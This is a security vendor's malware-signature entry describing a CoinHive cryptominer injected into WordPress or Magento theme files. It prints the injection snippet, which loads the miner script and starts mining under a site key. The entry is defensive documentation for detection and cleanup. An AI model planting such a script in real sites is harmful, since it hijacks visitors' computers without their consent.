Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.cryptominer.5

Description: Website contains an injected CoinHive JavaScript miner library, which pretends to be related to sucurifirewall.

The script can be injected into header.php and footer.php of WordPress themes:

<scr ipt src="https://coinhive[.]com/lib/coinhive.​min.js"></script>
<script>
	var miner = new CoinHive​.User('​wMi7wDDFODxuLxV9S0M32EK0G9czsndP', 'sucurifirewall'); 
	miner​.start();
</script>
More information.


Affecting: Magento

Mitigation How to clean a hacked Magento site


For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb